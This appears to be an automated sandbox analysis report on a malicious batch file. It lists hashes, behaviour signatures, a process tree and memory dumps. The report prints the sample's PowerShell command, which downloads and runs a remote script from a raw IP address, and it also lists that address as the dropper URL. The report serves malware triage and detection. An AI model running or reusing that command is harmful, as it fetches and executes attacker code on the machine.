Analysis
- max time kernel: 15s
- max time network: 45s
- platform: windows7_x64
- resource: win7v200722
- submitted: 29-09-2020 01:10
Static task: static1

Behavioral task: behavioral1
- Sample: 87f461a62a7de4013da81005cdc4ac08.bat
- Resource: win7v200722 (windows7_x64)
- 0 signatures, 0 seconds

Behavioral task: behavioral2
- Sample: 87f461a62a7de4013da81005cdc4ac08.bat
- Resource: win10 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: 87f461a62a7de4013da81005cdc4ac08.bat
- Size: 213B
- MD5: b80441d6d88bed0ea2c4aee192320ab0
- SHA1: cc5062b68194e72fcc39d78ec794eef77c631e11
- SHA256: 3f89ce5be773c28644ec626cd94037a02958f69cb9a571c6c69788af498e06c4
- SHA512: fd370a4178ed0204241dd84df0e234b4c971c27ef8d6d7a423a1a1e0679ffd82d3879642f9d484f0089ea11785361104073fae26f860dbabd594b8300de3bd35
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Source:
- URLs:
    ps1.dropper    http://185.103.242.78/pastes/87f461a62a7de4013da81005cdc4ac08
Signatures
- Blacklisted process makes network request (1 IoCs)
  Processes:
    flow    pid     process
    5       1784    powershell.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  Processes:
    pid     process
    1784    powershell.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes:
    pid     process
    1784    powershell.exe
    1784    powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
    description                 pid     process
    Token: SeDebugPrivilege     1784    powershell.exe
- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes:
    description                         pid     process     target process
    PID 1620 wrote to memory of 1784    1620    cmd.exe     powershell.exe
    PID 1620 wrote to memory of 1784    1620    cmd.exe     powershell.exe
    PID 1620 wrote to memory of 1784    1620    cmd.exe     powershell.exe
    PID 1620 wrote to memory of 1784    1620    cmd.exe     powershell.exe
Processes
- C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\87f461a62a7de4013da81005cdc4ac08.bat"
  - Suspicious use of WriteProcessMemory
  PID: 1620
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/87f461a62a7de4013da81005cdc4ac08');Invoke-AJLTPZ;Start-Sleep -s 10000"
    - Blacklisted process makes network request
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 1784
Network
MITRE ATT&CK Matrix
Downloads
- memory/1784-0-0x0000000000000000-mapping.dmp
- memory/1784-1-0x0000000074650000-0x0000000074D3E000-memory.dmp (Filesize: 6.9MB)
- memory/1784-2-0x0000000002310000-0x0000000002311000-memory.dmp (Filesize: 4KB)
- memory/1784-3-0x0000000004900000-0x0000000004901000-memory.dmp (Filesize: 4KB)
- memory/1784-4-0x0000000002510000-0x0000000002511000-memory.dmp (Filesize: 4KB)
- memory/1784-5-0x0000000004850000-0x0000000004851000-memory.dmp (Filesize: 4KB)
- memory/1784-8-0x0000000006000000-0x0000000006001000-memory.dmp (Filesize: 4KB)
- memory/1784-13-0x0000000006090000-0x0000000006091000-memory.dmp (Filesize: 4KB)
- memory/1784-14-0x0000000006150000-0x0000000006151000-memory.dmp (Filesize: 4KB)
- memory/1784-21-0x0000000006290000-0x0000000006291000-memory.dmp (Filesize: 4KB)
- memory/1784-22-0x00000000062C0000-0x00000000062C1000-memory.dmp (Filesize: 4KB)